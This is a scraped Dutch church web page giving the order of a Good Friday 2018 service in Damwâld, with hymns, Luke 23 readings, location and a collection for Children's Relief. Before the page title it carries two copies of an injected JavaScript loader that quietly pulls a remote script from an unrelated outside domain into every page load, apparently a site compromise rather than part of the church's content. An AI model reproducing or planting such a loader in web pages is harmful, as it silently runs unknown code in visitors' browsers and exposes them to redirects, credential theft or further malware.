;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Goede Vrijdag - PKN Damwâld
vrijdag 30 maart 2018
19:30 uur

Goede Vrijdag

Informatie

Voorganger:Ds. M.J. Koppe, Dokkum
Organist:Jaap van der Horn
Liturgie
Lied voor de dienst gez 177 : 1 t/m 6
Welkom en mededelingen
Intochtslied : ps 118 : 7 en 8
Stil gebed /votum en groet
Gebed om de H.Geest
We lezen: Lucas 23 : 33 – 43
We zingen: gez 187 : 1,2 en 3
We lezen: Lucas 23 : 44 – 49
We zingen: gez 189 : 1 t/m 4
Verkondiging .
We zingen: gez 183 : 1,2,3 en 5
Dankzegging en voorbeden
Collecte
Slotlied gez 192 : 1 t/m 6
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Children’s Relief

Goede Vrijdag Kerk: Stichting Children's Relief - Ondersteuning voor kinderen in achterstandssituaties
Children's Relief ondersteunt kinderen die in Oost-Europa opgroeien in achterstandssituaties. Zij zijn het meest kwetsbaar en hebben weinig kans op een goede toekomst. De projecten van Children's Relief richten zich op scholing, opvoeding, zorg en aandacht. Het welzijn van de kinderen staat voorop. Zij moeten zich kunnen ontplooien tot gezonde volwassenen. Zo kunnen zij betere kansen krijgen in de maatschappij. Children's Relief heeft in haar geschiedenis al veel kinderen kunnen helpen en begeleiden naar een beter bestaan. Stichting Children's Relief is verbonden met Stichting OostEuropa Zending.

Tweede collecte: Kerk
Uitganscollecte: Kerk